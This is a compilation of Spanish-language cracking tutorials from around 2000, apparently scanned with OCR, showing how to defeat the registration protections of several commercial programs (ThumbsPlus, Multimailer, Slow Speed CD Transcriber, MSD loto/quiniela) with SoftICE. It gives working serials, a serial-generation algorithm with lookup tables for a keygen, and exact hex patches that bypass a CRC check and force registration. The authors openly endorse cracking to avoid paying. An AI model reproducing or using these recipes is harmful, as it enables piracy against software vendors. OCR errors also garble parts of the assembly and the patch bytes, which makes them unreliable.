Registered to: Mr. 4ct MagO 
Thanks for registering Wave Flow. 


nos hemos registrado sin colocar nuestro número de serie recogido en 015f: 00471410 58 pop eax colocando d edx, pero...el 
programa estará registrado al reiniciarlo ? 


probemos: cerramos el programa, luego lo abrimos y nos saluda una imagen que dice registered to: act mago, eso quiere 
decir que lo hemos crackeado satisfactoriamente. 


el registro se conservó en el programa porque este tiene en el directorio un archivo llamado wavedit.ini, sitio donde coloca 
el registro, entonces para probar el número que habíamos conseguido en 015f: 00471410 58 pop eax colocando d edx, 
debemos borrar el archivo wavedit.ini.. 


borramos el archivo, abrimos el programa y aparece la opción register, le damos click y ahora para entrar a la caja de 
registro le damos click a enter password , ya en la caja insertamos nuestros datos, en mi caso: 


login: act mago 
password: 285172 
damos click en Ok y ....... 
good boy/ girl! 
registered to: mr. act mago 
thanks for registering wave flow. 


programa crackeado... y tenemos nuestro propio número de serie. 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoGhotmail.com 


saludos 


saludos a tnt!. excelente página, muy buen trabajo...sigan adelante. especialmente a xasx, (no pararé : ) ) 
saludos a dek_oin. 


saludos a toda la people de tutoriales2000. saludos a profesor x. 


saludos al l.d.a. (monofeo (gran amigo), flaco (pastero), chirda, taza, afo, solerman, nasal, peter y a todos los 
demás) 


saludos a todos los crackers del mundo. 


chao !! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, 


lean muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


act mago 2000 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2000 


Programa . Multimailer 3.x.x 

PROTECCION: Serial. 

Objetivo: Encontrar el serial. 

Descripcion: El programa sirve para enviar correo masivo por internet, especial para circulares. 

Dificultad: Facililla 

DOWNLOAD : http://www.webfacil.com 

Herramientas: Softice 

CRACKER: vinshuka FECHA: 29/11/2000 
introduccion 


el programa sirve para enviar correo masivo por internet, especial para circulares. 


se puede obtener desde http://www.webfacil.com. 


yo he crackeado este programa por dos motivos, el primero es que aunque tiene un precio moderado yo no tengo para pagarlo 
y no tengo tarjeta de crédito, lo otro es que desde que vi su primera versión desee crackearlo pero no pude hasta hoy (porque 
no sabia nada de nada, ahora se casi nada de algo =), este es el primero que crackeo sacándole un numero de serie valido. 


al atake 


bueno aquí les explico como lo crackie. 


(el bpx mas efectivo es el hmemcpy) 


ejecuto el winice, corro el multimailer 3.x.x, luego me dirijo a registrarme, introduzco todos los datos que me pide: 


nombre de registro: vinshuka (coloca tu nombre) 


licencia : 12345678 


código de control:stko (por santiasko de shile) 


luego hago control+d y aparezco en el winice, coloco bpx hmemcpy presiono enter y control+d. 


ahora hago click en aceptar y ahora quiebro en kernel!hmemcpy presiono f11 y aparezco en push word ptr[di], escribo 
bd* para que no quiebre nuevamente. 


ahora voy apretando f10 hasta llegar al código del multimailer (-multimail!code...-) sigo con £10 hasta encontrar la 
siguiente combrobacion cmp ebx,eax , donde ebx = al numero de licencia que he colocado (12345678), lo compruebo 
con ?ebx... y eax = al número de licencia valido para mi nombre, en este caso 220705. 


sigo con £10 hasta llegar a la pantalla de error. 


ahora escribo el numero de licencia válido o sea 220705, presiono control+d y escribo be* o bien be0 (para dejar 
activo el bpx hmemcpy), control + d y click en aceptar, repito el método del £10, cuando llego a la comprobación del 
numero de licencia ahora saltamos a 004956ac... 


cuando era erróneo ocurría esto 


cmp ebx, eax 


3z 0049564c (no jump) 


sigo lentamente con f10 hasta encontrar la siguiente comprobación: 

cmp al, 42 

jnz 00495874 

compruebo con 

?al 

242 

donde al = s (el primer carácter de mi código de control) y 42 = b(el primer carácter del código de control valido) 
ahora con control y flecha abajo busco más comprobaciones parecidas a esta, y me encuentro con las siguientes: 
emp al,43 

(mas abajo) 

cmp al,4b 

(mas abajo) 

cmp al,35 


(mas abajo) 


cmp al,31 
ya sé que al = un carácter de nuestro código de control y que 43h =c 4bh=k 35h=3 31h=1 


entonces recopilando todos esos al obtengo el código de control que coloque, y en 42,43,4b,35,31 los caracteres del 
código de control valido, o sea, bck51, pues bien ya tengo el registro valido, pongo be* (para borrar todos los bpx que 
tenga) y control+d, ahora introduzco los datos correctos, en este caso 


nombre de registro:vinshuka 
licencia:220705 

código de control:bck51 
excelente ya estoy registrado. 


(si ponemos menos de 5 caracteres en código de control o menos de 4 el nombre nos mandara directamente a la 
pantalla de error, revisar esto si te interesa, se puede hacer el generador de llaves, hasta ahora yo no se) 


por vinshuka santiasko de shile 2mil 
dudas o comentarios sobre este ensayo 


e-mail: vinshukaO spacemail.com 


url : http://vinshuka.tsx.org, 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Thumbs Plus 4.10 

PROTECCION: Name / Serial 

Objetivo: Obtener nuestro número y los datos para hacer un keygen 

Descripcion: Tratamiento de imágenes (en tamaño real y reducido) 

Dificultad: Facililla 

DOMNECADE http://cerious.com ó http://descriptions.newmail.ru/utilities.html 
(FOSI) 

Herramientas: Softice 

CRACKER: Caos reptante FECHA: 05/12/2000 


introduccion 


este programador va de mal en peor. primero daba la clave al registrarse (v.2), posteriormente supongo que 
mandaba el parche (v.3), en ambos casos concedía un período de prueba. pero ahora ya pide el serial 
number al instalar el programa. no sé donde vamos a llegar con tanta codicia... 


le castigaremos descubriendo nuestro serial number. por cierto: si bajamos el programa de fosi veremos 
que ya viene con un número, pero nosotros lo queremos registrado a nuestro nombre y además, queremos 
hacerlo con deportividad. j 


como este programa pide el número de registro durante el proceso de instalación, nos obliga a trabajar 
sobre archivos temporales, por lo que dadas mis notables limitaciones como cracker, dejaremos para otro 
momento el tema de parchearlo. 


así pues, trabajaremos exclusivamente con el softice, sin ayudarnos de ninguna otra herramienta. | 


al atake 


como he dicho antes, durante el proceso de instalación aparece la correspondiente ventana de registro. debemos 
introducir el número correcto si queremos continuar. como número, acostumbro a poner el de mi teléfono, es un 
número que me es familiar y que no se presta a confusión, ya que cadenas del tipo 12345... se encuentran en otros 
puntos que no tienen que ver con el que nos interesa, y las formadas por números repetidos tienen el inconveniente 
de no poder saber cual de los números está leyendo el programa en ese momento.¡ah! esta vez no he puesto mi 
número de teléfono -por modestia naturalmente- o sea que no llaméis preguntando por caos reptante, porque 
seguramente os mandarán a paseo... 


Registration Information 


Registration Information 


Please enter the name and registration code for 
ThumbsPlus version 4.10-R into the fields below. This 
information is contained in pour e-mailed license letter. 


User name or e-mail address: 


[Caos reptante 


Assigned registration code: 


[932345678 


< Back Cancel | 


antes de pulsar next, pulsaremos control-d para que aparezca el sice e introduciremos un breakpoint. probaremos con 
bpx getwindowtexta. pulsar f5 para volver al programa, next y ¡¡ploff!! estamos en el sice. otra vez f5 para que lea el 
código. ahora f12 para que termine de ejecutar la llamada y vuelva al programa principal. (vuelve a la primera) 

estamos en glkd393, este nombre varía cada vez que se ejecuta el programa de instalación pero el formato es siempre 
el mismo: gl_nnmn. (con bpx hmemcpy también habría funcionado pero el camino hasta aquí hubiera sido más largo). 


ahora localicemos en la memoria nuestro nombre y número. pondremos: s 30:00 | “caos reptante? y s 30:00 l 
TT 932345678' veremos que el nombre está en 0030:0066e930 y el número en 0030:0066€e430. recordad que si 
alguno de estos datos está situado en un lugar que no parece el apropiado, podemos seguir buscandolo introduciendo 
simplemente el comando s. el paso siguiente podría consistir en pillar al programa cuando está leyendo el nombre o 
el número. 


para ello estableceremos dos nuevos breakpoints (el anterior lo podemos borrar con bc * ó bc 0, o dejarlo inactivo 
con bd * ó bd 0) los cuales nos detectarán la lectura o escritura en los lugares ocupados por nuestros datos:bpr 
30:66e930 30:66e93c rw y bpr 30:66ea30 30:66ea38 rw. pulsamos f5 y aparecemos en kernel32. no nos interesa lo 
que pasa aquí, f12 un par de veces y estaremos en glcd385. (también es un nombre variable) a partir de aquí 
tracearemos pacientemente, y llegaremos a un punto interesante. 


¿9 


nota: las direcciones pueden variar. cuando "trabajé" el programa por primera vez la dirección siguiente era: 
0167:d810cd, al ejecutarlo ahora , la dirección es: 0167:008710cd. 


0167:008710cd movsx eax, byte ptr [edi] -—-dirección de la primera letra 
0167:008710d0 push eax 
0167:008710d1 call 871460 


0167:00871460 mov eax, [00877530] 

0167:00871465 sub esp, 08 

0167:00871468 test eax, eax 

0167:0087146a push ebx 

0167:0087146b 3jnz 0087148b 

0167:0087146d mov eax, [esp+10]---código ascii de la 1? letra, "c"=43 


0167:00871471 cmp eax, 61 -------- si el código de la letra está comprendido entre 
0167:00871474 31 00871559 -----=-=-- 61 y Ta, o sea, que es minúscula, le resta 20, 
0167:0087147a cmp eax, la -----=-=-- es decir que la convierte en mayúscula, en caso 
0167:0087147d 3g 00871559 -----=-=-=-= contrario, salta a 00871559. 

0167:00871483 sub eax, 20 

0167:00871486 pop ebx n ebx las 8 últimas cifras de nuestro número 


0167:00871487 add esp, 08 
0167:0087148a ret 


0167:00871559 pop ebx 
0167:0087155a add esp, 08 
0167:0087155d ret 


0167:008710d6 mov esi, eax pon n esi el código (43) 
0167:008710d8 mov eax, [00875324] 

0167:008710dd add esp, 04 

0167:008710e0 cmp eax, Ol 

0167:008710e3 jle 008710£5 


0167:008710f5 mov ecx, [00875118]-se pone en ecx la dirección de comienzo de la 1? tabla 
(875122) 

0167:008710fb mov ax, [esi*2+ecx]-(43*24+875122=8751a8)en esta dirección está el 

valor 81, el cual se pone en eax 

0167:008710ff and eax, 00000107 --81 and 107=1 

0167:00871104 test eax, eax 

0167:00871106 3z 0087111d 

0167:00871108 mov eax, esi 

0167:0087110a xor ecx, ecx 

0167:0087110c and eax, 000000ff -—-—-reduciría eax a dos cifras 

0167:00871111 not ebp bp pasa de 0 a f£fffffff 

0167:00871113 mov cl, [eax+00874098] -43 mas la dirección de comienzo de la 2? 

tabla es igual a 008740db (donde hay un 3 que se pone en ecx) 

0167:00871119 rol ebp,cl como ahora ebp vale ffffffff, no cambia al 

efectuar la rotacion de bits, en la segunda letra, 43 se desplazará 2 bits a la izquierda 


por lo que ebp=10c 


0167:0087111b xor ebp, eax (ff ffffff xor 43=ffffffbc)¡esto es importante! 
0167:0087111d mov al, [edi+01] ----61 (el código ascii de "a") 

0167:00871120 inc edi la dirección de "a" 

0167:00871121 test al, al -------- ¿es la última letra? 

0167:00871123 3jnz 008710cd ------- como no lo es, volvemos al inicio del bucle 


todo este berenjenal ha servido para colocar en el registro ebp un valor que se va a modificar al procesar cada letra 
de nuestro nombre. cuando termina de procesar todas las letras continuamos la ejecución del programa, en este 
momento, el valor de ebp (en mi caso) es 5406542a . 


0167:00871125 mov esi, [esp+00000214] 


0167:0087112c not ebp bp igual a abf%abd5 ¡que número tan bonito! 
0167:0087112e mov eax, ebx ahora eax contiene nuestro número 
0167:00871130 xor eax, ebp si esta comparación da cero, nos dará una 


licencia para 1 usuario, si no, seguirá comprobando... 


o sea que el primer número que encontramos es abf9abd5.(un usuario) 


0167:00871132 cmp eax, 12cb1419 --¡otro número bonito! 


este número debería dar cero con eax que contiene el número de serie "xoreado" con abf9abd5. así el número bueno 
sería: 

12cb1419 0001 0010 1100 1011 0001 0100 0001 1001 

abf9%abda5 1010 1011 1111 1001 1010 1011 1101 0101 

xor-=---> 1011 1001 0011 0010 1011 1111 1100 1100 


es decir: b932bfcc, que nos dará derecho a "200 seats" 


0167:00871137 ja 00871157 

0167:00871139 3z 0087114d 

0167:0087113b test eax, eax 

0167:0087113d 3jnz 00871240 ------- aaargh! 
0167:00871143 mov eax, 008750f4 

0167:00871148 jmp 00871245 ------- (1) j 
0167:0087114d mov eax, 008750€e8 

0167:00871152 3jmp 00871245 ------- (200 seats) j 


0167:00871157 cmp eax, 29a4f228 


con el mismo sistema que el anterior, veríamos que este número es 0253d59fd. (100 seats) 


0167:0087115c ja 0087117f 
0167:0087115e 3z 00871175 
0167:00871160 cmp eax, 15cb1419 


0167:00871165 3nz 00871240 ------- aaargh! 
0167:0087116b mov eax, 008750dc 
0167:00871170 3jmp 00871245 ------- (100 seats) J 


después de todo esto, espero que los "seats" por lo menos sean córdoba j 


todavía sigue con el reparto de premios ya que hay licencias para todo, desde la de un usuario a la ilimitada, así que 
podemos escoger la que queramos, pero vamos a dejarlo, que por hoy ya está bien. 


os habréis dado cuenta de que como toda esta movida es únicamente para instalar el programa, si se introduce el 
valor correcto en el registro eax (el que lleva nuestro número chungo) antes de la comprobación, nos aceptará el 
número y continuará con la instalación por lo que en teoría no lo necesitaríamos nunca más, pero es mejor tomar 
nota del número para el día que tengamos que formatear el disco duro y reinstalar windows desde cero. | 


he explicado el cálculo del número con cierto detalle, por si alguien se anima a hacer un keygen. 
solo falta ver las tablas: 


tabla 1 


0167:00875122 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 
0167:00871132 20 00 28 00 28 00 28 00 28 00 28 00 20 00 20 00 
0167:00875142 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 
0167:00875152 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 
0167:00875162 48 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 
0167:00875172 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 
0167:00875182 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 
0167:00875192 84 00 84 00 10 00 10 00 10 00 10 00 10 00 10 00 
0167:008751a2 10 00 81 00 81 00 81 00 81 00 81 00 81 00 01 00 


tabla 2 


0167:00874098 00 01 01 02 01 02 02 03 01 02 02 03 02 03 03 04 
0167:008740a8 01 02 02 03 02 03 03 04 02 03 03 04 03 04 04 05 
0167:008740b8 01 02 02 03 02 03 03 04 02 03 03 04 03 04 04 05 
0167:008740c8 02 03 03 04 03 04 04 05 03 04 04 05 04 05 05 06 
0167:008740d8 01 02 02 03 02 03 03 04 02 03 03 04 03 04 04 05 
0167:008740e8 02 03 03 04 03 04 04 05 03 04 04 05 04 05 05 06 


espero que este tutorial os sea de utilidad y os recuerdo que el crackear programas es sólo un ejercicio intelectual y 
que si Os parece que el programa vale la pena, debéis dirigiros al codicioso programador y pagarle esos dineros que 
tanta falta os hacen para que él se los reviente en chucherías para sus hijos. 


finalmente un saludo para todos aquellos que comparten sus conocimientos con los demás y especialmente a karpoff 
por el trabajo realizado. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Slow Speed CD Transcriber vl1.39b 


Código de registro. 

Simular estar registrados. 

No tiene. 

Casi Nula, Super Ultra Newbie 
http://www.ronimusic.com 

File insPEctor v3.0 y Softlce v4.05 


Act Mago FECHA: 24/11/2000 


INTRODUCCION 


hola amigos, presento mi décimo tercer tutorial. ya saben, si tienen alguna duda sólo pregúntenlo 


actmagoO hotmail.com, como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u 
otras cosas. en este tutorial volveremos a usar el softice. si no lo tienes instalado puedes bajártelo en 
www. crackstore.com . asumo que tienes conocimientos básicos sobre su uso. y para terminar con la intro debo 


decir : este texto ha sido escrito sólo con propósitos educacionales. 


se los quedo debiendo :) 


contamos con softice... 


al atake 


abrimos el programa y nos aparece un mensaje que dice algo así... 


nota! debes abastecer tu identificación de usuario cuando ordenes. user id: 2ee3ccc3 


y luego esto: 


sólo el segundo y tercer track están disponibles en la versión no registrada! lee el archivo order.txt para saber como ordenar 
la versión completa! 


ya en el programa vamos a help ----- >password y ahí nos encontramos con la caja de registro que luce así... 


Enter your password - User ID: 2EE3CCC3 E3 


pr 
DK | Cancel Help | 


insertamos cualquier cosa y damos click en ok y aunque por mala que sea la protección del programa, este no es tán 
estúpido para aceptarnos lo que hemos introducido y nos mostrará algo así... 


Slow Speed CD Transcriber 


/N Not a valid password! 


al darle click a aceptar el programa nos manda a order.txt automáticamente. ..como se puede ver estos tipos están ansiosos. 
nota: eso del id no me lo creo ni loco, tengo otro programa de la misma compañia y el id es el mismo. 
a continuación... cerramos slow speed cd transcriber., 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v3.0el que nos mostrará los siguiente datos: 


el programa está desarrollado en microsoft visual c ++ 5.0 
no está encriptado 
no está empacado 


con la información que tenemos creo que el camino más fácil y limpio será usar nuestro querido softice para conseguir el 
password. 


a continuación... cerramos file inspector v3.0. 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos slow speed cd transcriber y vamos directamente a la caja de registro en donde introducimos nuestro 
código de registro. todavía no damos click enoK ; lo que ahora debemos hacer es presionar control+dpara que salte el 
softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx getdlgitemtexta y presionamos enter, luego presionamos f5 para salir del 
softice. ahora le damos click a0K y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamosf11 1 vez, para caer aquí... 

015f: 0040844c ese6ftdffff call 0O4081c0---->aquí está contenido el código ( presionamos f8 ) 

015f: 00408451 85C0 test eax, eaX -------=-=-=--- > algo se prueba :) 

015f: 00408453 7457 jz 0040842C Verna > nos manda al mensaje de registro aceptado, se puede comprobar con r fl z 
bueno ahora debemos presionar f8 para entrar en la call y caeremos aquí... 

015f: 004081c0 83ec50 sub esp, 50 

a continuación presionamos f10 10 veces para llegar aquí... 

015f: 004081e2 83c404 add esp, 04 --->colocamos d ecx y si bajamos unas lineas en la windowdata podremos ver el código 
y para los que le gusta la precisión... presionamos f10 19 veces para llegar aquí... 

015f: 00408222 68003e4200 push 00423e00 -------- >colocamos d eax = drt-yd3-zk98p 


ya lo hemos hecho, ahora sólo debemos colocar el password en la caja de registro y... 


Slow Speed CD Transcriber 


/N Thanks for registerina! 


programa crackeado... 


saludos a profesor x. ( gran amigo!!) 


saludos a dek_oin.( estamos locos!! ) 


saludos a IntIcrack!tteam ( saludos a xasx, no parare : ) ) http://www.tntcrackers. ws 


saludos a raziel. ( buen grupo el k-for) 


saludos a karpoff ( excelente página loco!!) http: //welcome.to/karpoff 


saludos y agradecimientos aV¡ p€ F del grupo [k-for] ,por el genial file inspector. 


saludos a toda la people de tutoriales2000. 


saludos al Idea ( monofeo (gran amigo), flaco (te pillaron! , jaja!!), chirda, taza, afo, solerman, nasal, 
peter y a todos los demás) 


saludos a todos los crackers del mundo. 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


actmagoO hotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 
ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 


DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Msd_loto 5.03 y Msd_quin 5.06 


Anti_debug, CRC y Serial 
Registrarnos 


Programas para hacerse "ricos" con las quinielas y/o bono-loto 
y/o primitiva ;) 


Avanzado. 


http://www.msdsoft.com 


SoftIce v4.05, IDA 4.04 Pro, Hiew 6.55 ó UltraEdit32 7.10a, 
UnLZEXE v0.9la, UN-PACK v1.9 


Crick FECHA: 22/11/2000 


¡¡ atención !! 


después de escribir este tutorial, alguien me escribió y me dijo que lo había probado, que había funcionado 
bien el tema del registro pero: algunas opciones del programa que graban datos a disco ¡¡¡ no lo hacían !!! 


volví a repasar el procedimiento y me dí cuenta de algunas cosas en las que no había reparado antes... 


podeis leerlo todo en la sección ¡¡ ahora sí que sí !! (al final del documento). 


de todas formas, espero que os ilustre el tema del hardpatching $ ) 


introduccion 


hola de nuevo. 

hace un par de semanas alguien escribió en es.comp.cracks un mensaje a crack el destripador pidiéndole el 
crack para estos programas. quejándose de que no había cracks para software español. 

como sé que crack (y marmota) están bastante liados con su pupe (por cierto, muy bueno!!) y, además, me 
picó la curiosidad porque se trata de programas para ms-dos (sí, todavía existen), decidí bajármelo y curiosear 


un poco... 


y este es el resultado... ;) 


al atake 


el programa, al instalarlo, crea dos subdirectorios: msd_quin y msd_loto. en cada uno de ellos encontramos a 
msd_quin.exe y msd_loto.exe, respectivamente. 

como tenía que empezar por alguno de ellos, me decidí por msd_quin.exe 

(tengo que decir que los dos están protegidos de igual forma. gracias, msdsoft ;) 


como siempre, lo primero es conseguir información sobre el programa. 
pasándolo por el unpack obtenemos: 


* msd_quin.exe is dos executable file (mz exe) 
* file size 98133 bytes 


ES a rs ca o LO 0012 


* entry point.............: $00015782 (87938) 
* lzexe v.0.90/1.00a (file ofs: $00015782) 
* unpacker not available <<<-- mentira. unlzexe v0.9la ;) 


¿comprimido con lzexe?. bueno, pues lo descomprimo con unlzexe 


¡houston, tenemos un problema!, el programa arranca pero al entrar en algunas opciones "casca". ¿por qué? no lo sé 
exactamente, pero me imagino que es porque el programa usa overlays y al descomprimirlo no funciona correctamente 


( 


es igual, ya sabemos descomprimir manualmente, ¿no? 


quiero hacer aquí un inciso. el programa lleva una protección anti-traza (¿por qué os empeñais en decir "traceo", con 
lo mal que suena) captura la int 01 y la int 03, con lo cual, si intentáis trazarlo, se os escurrirá de las manos. además, al 
ser un programa de ms-dos, el symbol loader no lo carga!!! (si estoy equivocado, rectificadme) entonces, ¿cómo coño 
lo paramos? pues, precísamente, con sus propias armas, con la int 03. (si alguien sabe alguna otra forma que me lo diga 


) 


(fin del inciso) 


editamos el msd_quin.exe con hiew o ultraedit32 
buscamos el punto de entrada (entry point: 15782) 
debe haber esto: 


06 push es 
0e push cs 


lo cambiamos por: 


cd03 int 03 ;) 


vamos a softice (ctrl+d) y capturamos la int 03 con i3here on 
salimos de softice (f5) y ejecutamos el programa. 

estamos en softice de nuevo, justo después de la int 03 que pusimos. 
ahora debemos dejar las cosas como estaban. escribimos: 


a eip-2 <intro> 
push es <intro> 
push cs <intro> 
<intro> 
r eip=eip-2 <intro> 
<<<--= el . nos sitúa en el eip actual, es decir, al principio de nuestro ejecutable. 


[FEA kk kk KK KK KK KK program entry point ****x*x*x*x 
:0001.0012 06 push es <<<-- debemos estar aquí 
:0001.0013 0e push cs 

:0001.0014 1f pop ds 

:0001.0015 8b0e0c00 mov cx, [000c] 

:0001.0019 8bf1 mov si, cx 

:0001.001b 4e dec si 

:0001.001c 89f7 mov di, si 

:0001.001e 8cdb mov bx, ds 

:0001.0020 031e0a00 add bx, [000a] 

:0001.0024 8ec3 mov es, bx 

:0001.0026 b400 mov ah, 00 

:0001.0028 3led xor bp, bp 

:0001.002a fd std 

:0001.002b ac lodsb 

:0001.002c 01c5 add bp, ax 

:0001.002e aa stosb 

:0001.002f e2fa loop 002b <<<-- relocalización del código 
:0001.0031 8b160e00 mov dx, [000e]  <<<-- cra 
:0001.0035 B8ac2 mov al , dl 

:0001.0037 29c5 sub bp, ax 

:0001.0039 8acó6 mov al , dh 

:0001.003b 29c5 sub bp, ax 

:0001.003d 39d5 cmp bp, dx <<<-—- comprobación del crec 
:0001.003f 740c je 004d 

:0001.0041 ba9101 mov dx, 0191 <<<-- si no es correcto el crc nos echan :( 
:0001.0044 b409 mov ah, 09 

:0001.0046 cd21 int 21 

:0001.0048 b8ff4c mov ax, 4cff 

:0001.004b cd21 int 21 

:0001.004d 53 push bx 

:0001.004e b85300 mov ax, 0053 

:0001.0051 50 push ax 

:0001.0052 cb retf <<<-—- saltamos al código ya reubicado. 


la comprobación de crc se puede saltar olímpicamente. 
cambiamos el: 740c je 004d 

por: eb0c jmp 004d 

... y Solucionado. 


a partir de aquí la cosa se complica, hay que encontrar el salto al programa principal original. 
si trazamos saltándonos los bucles llegamos a: 


:0001.0188 fa cli 

:0001.0189 8ed6 mov ss, si 

:0001.018b 8be7 mov sp, di 

:0001.018d fb sti 

:0001.018e 2eff2f jmp far word ptr cs: [bx] <<<-- te pillé 


bueno, ¿y qué? 

pues ahora viene lo jodío: encontrarle un punto flaco al programa. 

lo de buscar un número de clave correcto lo deseché enseguida, las rutinas de encriptación de claves me aburren :( 
si lo intentáis, cuidadín con las int 01 e int 03 !!! (deshabilitadlas en softice con ilhere off e i3here off) 

después de varias horas código arriba, código abajo :/ llegareis a esto: 


:0001.c1b5 9a87002ald call 1d2a:0087 
:0001.clba 8b867eff mov ax, [bp+ff7e] 
:0001.clbe 3b06dd23 cmp ax, [23dd] 
:0001.c1c2 750e jne cld2 

:0001.c1c4 8b867cff mov ax, [bp+ff7c] 
:0001.c1c8 3b06df23 cmp ax, [23df] 
:0001.cl1cc 7504 jne cld2 

:0001.c1ce b000 mov al, 00 

:0001.c1d0 eb02 jmp cl1d4 

:0001.c1d2 b001 mov al, 01 <<<-- punto "g" 
:0001.c1d4 a2e123 mov byte ptr [23e1l], al 
:0001.c1d7 a0el23 mov al, [23e1] 
:0001.clda 50 push ax 

:0001.cldb 9a00002ald call 1d2a:0000 
:0001.c1e0 08c0 or al , al 

:0001.cle2 752a jne c20e 


podemos ver el típico flag en al: (0/1) 
¿Qué pasaría si lo forzamos a 0? 
podemos editar el código con el softice así: 


a c1d2 <intro> 
mov al, 0<intro> 
<intro> 


si continuamos la ejecución con f5 nos podremos registrar !!! 


claro que... 

¿cómo modificamos el código si está en la parte comprimida del programa y, además, el programa descomprimido con 
unlzexe no funciona !!!1122999 

¿conoceis el hardpatching? ¿no? pues leeros el coc-2000 de mr. nobody ;) 

se trata de parchear la rutina que descomprime el programa para que en el momento que ya exista el byte (o bytes) a 
cambiar sean modificados "al vuelo". 

hay varias maneras de afrontar esto, pero yo elegí la fácil :) 

me espero justo al momento en que se va a producir el salto al programa original, parcheo y devuelvo el control. en 
otras palabras: 


2* modificación 
os acordais de esto: 


:0001.0188 fa cli 

:0001.0189 8ed6 mov ss, si 

:0001.018b 8be7 mov sp, di 

:0001.018d fb sti 

:0001.018e 2eff2f jmp far word ptr cs: [bx] <<<-- te pillé 


en 018e se produce el salto al programa original, lo cambiamos por: 

eb90 jmp 0120 

elegí la dirección 0120 porque si observais la zona con un editor hexadecimal vereis que tiene esto: 
fabrice bellard 

un texto "en claro" que no queremos para nada y que nos deja 15 bytes de maniobra. 

ahora introducimos algo de nuestra cosecha, en 0120 ensamblamos: 


06 push es <<<-- guardamos los registros que vamos a tocar 

57 push di 

2ec43f les di, cs: [bx] <<<-- cargo en es el segmento del programa original (os recuerdo que 
estaba en cs: [bx]), di me da igual 

26c606d3c100 mov byte ptr es: [cl1d3],0 <<< c1d3 es el desplazamiento hasta nuestro byte 
(01) 

5f pop di <<<-- restauramos los registros 

07 pop es 

2eff2f jmp far cs: [bx] <<<-- ahora saltamos al programa original 


pero... un momento... son 16 bytes, nos sobra 1 !!!! 


no pasa nada. 


en vez del último 2eff2f introducimos: 
eb61 jmp 0190 <<<-- 15 bytes. ok! 


y en 0190 encontramos otra cadena: crc error que no creo que nos vaya a salir nunca xddddd 


pues ahí acabamos: 
2eff2f jmp far cs: [bx] <<<-- chin pún 


estas modificaciones se introducen con un editor hexadecimal y cuando ejecutemos el programa tendremos la opción 


resumiendo: 


editamos el msd_quin.exe con un editor hexadecimal. 
buscamos: 740cba9101 

cambiamos por: eb0cba9101 

buscamos: 2e££2£ 

cambiamos por: eb902ef££2£ 

buscamos: fabrice bellara (en ascii, por supuesto) 
cambiamos por: 06572ec43£26c606d43c1005f£07eb61 
grabamos los cambios. 


para el otro programa, el msd_loto.exe, es algo diferente porque el desplazamiento hasta nuestro byte incluye un 
cambio de segmento que hay que tener en cuenta. 


el código queda así: 
018e eb90 jmp 120 


0120 06 push es <<<-—- guardamos los registros 

0121 50 push ax 

0122 2e8b4702 mov ax, cs: [bx+2] <<<-- cargamos en ax el segmento del programa original 
0126 050010 add ax,1000 <<<-— aumentamos el segmento 
0 
0 
0 


129 50 push ax 
130 07 pop es 
131 eb63 jmp 0190 <<<-- no nos cabe más 


0190 26c606271400 mov byte ptr es: [1427],0 <<<-- 1427 es el desplazamiento hasta el 01 que 
cambiamos por 00 

0196 58 pop ax <<<-- restauramos los registros 

0197 07 pop es 

0198 2eff2f Jjmp far cs: [bx] <<<-- ¿hace falta explicarlo? 


resumiendo: 


editamos el msd_loto.exe con un editor hexadecimal. 

buscamos: 740cba9101 

cambiamos por: eb0cba9101 

buscamos: 2eff2f 

cambiamos por: eb9026c60627140058072e££2f 

buscamos: fabrice bellara (en ascii, de nuevo) 

cambiamos por: 06502e8b47020500105007eb63 <<<-- nos sobran 2 bytes 
grabamos los cambios. 


¡¡ ahora sí que sí !! 


si habeis leído el aviso al principio de este documento sabreis que lo leído hasta ahora no es 100% efectivo. 


si volvemos a la zona de código donde modificabamos el valor que tomaba al, os la recuerdo: 


:0001.c1b5 9a87002ald call 1d2a:0087 

:0001.clba 8b867eff mov ax, [bp+ff7e] <<<-== carga crc-1 bueno en ax 
:0001.clbe 3b06dd23 cmp ax, [23dd] <<<-= lo compara con el malo-1 
:0001.c1c2 750e jne cl1d2 <<<-- si no son iguales malo 

:0001.c1c4 8b867cff mov ax, [bp+ff7c] <<<-= carga crc-2 bueno en ax 
:0001.c1c8 3b06df23 cmp ax, [23df] <<<-= lo compara con el malo-2 
:0001.c1lce 7504 jne cl1d2 <<<-- si no son iguales: ya sabes... 
:0001.c1ce b000 mov al, 00 <<<-- el premio 

:0001.c1d0 eb02 jmp cl1d4 

:0001.c1d2 b001 mov al, 01 <<<-= ahora no pasamos por aquí 
:0001.c1d4 a2e1l23 mov byte ptr [23e1l], al 

:0001.c1d7 a0el23 mov al, [23e1] 

:0001.clda 50 push ax 

:0001.cldb 9a00002ald call 1d2a:0000 

